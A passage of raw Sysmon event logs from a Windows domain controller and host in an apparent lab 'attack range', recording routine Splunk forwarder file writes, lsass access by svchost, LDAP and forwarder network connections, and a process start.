32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000286112Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:54.817{C8EA50B7-F11F-6215-1000-000000003802}364NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\security\audit\audit.csvMD5=599B993BBDE2D28B5D6875F309356DA3,SHA256=BE7FE47B3C548E79758ACC68217D95C2B10D8DBDC2D7CFF556FC9CA65E6C7659,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286111Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:54.676{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286110Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:54.661{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000286109Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:54.661{C8EA50B7-0F2D-6216-C404-000000003802}1164ATTACKRANGE\AdministratorC:\Windows\system32\mmc.exeC:\Windows\System32\GroupPolicy\Machine\Microsoft\Windows NT\Audit\audit.csvMD5=599B993BBDE2D28B5D6875F309356DA3,SHA256=BE7FE47B3C548E79758ACC68217D95C2B10D8DBDC2D7CFF556FC9CA65E6C7659,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286108Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:54.614{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20DF20C0047AABE7979928B47AA93AE6,SHA256=0610698DC0D78DA6E8BE31A6A4A3A18FE5D6484E61A07CF36F754C81F13C75BF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286107Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:51.604{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53302-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286118Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:55.848{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E4716E05E861A2A666A6A81844C69B47,SHA256=00C17BF1F27C720128186331DB086A0C5F55CF9DA4ED943CC90DBBFF0693E227,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286117Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:55.848{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5611F01D94CF4D8FAB21C6312D3655DC,SHA256=DD7A57145B80E7FEDB692BFF082CEE92B7C5D7017925B20FA7AFE1AD34D50B1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286116Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:55.676{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=03FF42C16DD6775B1C796EAB2D5D2C20,SHA256=C0123278C312246C345367B0EE05CBABA91FD8A0106A7985C2F8429C0F3F3131,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286115Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:55.676{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=A5BA00FB08177F57C79A9BDEA53CA0D5,SHA256=504D4297885A77D0066C5CE4E3192E979C86D939AB674E85C090D709D3E157E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286114Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:55.630{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F2D861D794544ED850257191CFCA700,SHA256=6364C52682437DA2B885B134514C28BB4E28956AE752B552BE86AA931B99D879,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215145Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:53.613{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51235-false10.0.1.12-8000- 23542300x8000000000000000215144Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:55.034{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B19853F677C0A380DD34B4F544EB0E2,SHA256=B1E215C5E45A20748EB30680752E8FD4C9E52CDA9B66C46DA9147BE8DCD1A08B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286123Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:56.630{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D343FE2B0D51AA8A67ECEE6AE8EDB61,SHA256=2129363A4EED1A2E1EB3717BBC04C332E9733356DFB290ECC28ED6B8E26FEBA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215146Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:56.112{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FD7116F066C00E84C9C37FECC005AE8,SHA256=6BC5FE4C63D043D3841B929124BAEE68A6BA00CAECF86A075196573E12FEEDD9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286122Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:54.157{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53304-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000286121Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:54.157{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53304-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000286120Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:54.143{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53303-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000286119Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:54.143{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53303-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000286124Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:57.645{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C89DA0C968D7B751293AB93E64EB91C6,SHA256=FBA9862C0C6B542CF642333046E9C5785E1207A6DB400B98A2DE9AF8BE617743,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215147Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:57.112{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F46DC9116B75B6A5B3EAED66D76A3524,SHA256=5A4CB875D285AC2FEC34A6AF7738748CF02CF36498DB0890BEE95F8202298F41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286126Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:58.645{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1051B9A697A37428BCB2F847C2DB3BD8,SHA256=1955E490851CDA97B02122C073605A6D150C995F04B7A35C5899C3D04B6CC31A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215148Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:58.112{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CB12274ED9A6002B3A01DF7757C2B66,SHA256=F5389F94D62FBEE717F4848841971828B14146272304137265B9C378EE922B42,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286125Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:56.667{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53305-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286127Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:59.661{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6AC429CEBB1A6E2F956CDAFB4E28AAFF,SHA256=16689445671606987991E169D0B1A6713131F308FEF53AF9E75D5FAC5FF038BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215149Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:59.128{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD25C8A1305FADB09FBF3D8359680F33,SHA256=3B9AA418207FC4D2FA0C5E418C1BEBF8A77F33B6165F0D4C34C626F7A957269E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286128Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:00.676{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E65255F02994824821E0051CD31C351,SHA256=DAFF7DD7AAD11CDD5FF0D0375087586D7F5A24A1B5B347C26B66D41E328B6BCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215150Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:00.128{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4F6AFE798EBE50A76652D3A0A4A1FBF,SHA256=4AD5D1A7E1DA8B3B27CF131F00FCEB1E4E14CF3E166CC0856E2B17F9084587C7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286138Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:01.973{C8EA50B7-0F79-6216-CC04-000000003802}33325104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286137Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:01.770{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0F79-6216-CC04-000000003802}3332C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286136Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:01.770{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286135Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:01.770{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286134Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:01.770{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286133Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:01.770{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286132Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:01.770{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-0F79-6216-CC04-000000003802}3332C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286131Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:01.770{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0F79-6216-CC04-000000003802}3332C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286130Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:01.771{C8EA50B7-0F79-6216-CC04-000000003802}3332C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000286129Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:01.692{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81F57E59E57B63C7547B12D561C73BC3,SHA256=DDE79744E0AE532A3430773A4306820C7B63F64212AFCD96FA3E93BDF6442BAC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215152Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:59.504{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51236-false10.0.1.12-8000- 23542300x8000000000000000215151Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:01.222{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FD83EB007D8DFD460E0935DBCF42C3B,SHA256=3CCB854119D4B3FC88E7BCF87B26C9D50DAE663937C80648644327ECE88BD84E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286150Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:02.978{C8EA50B7-F11D-6215-0B00-000000003802}6286044C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286149Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 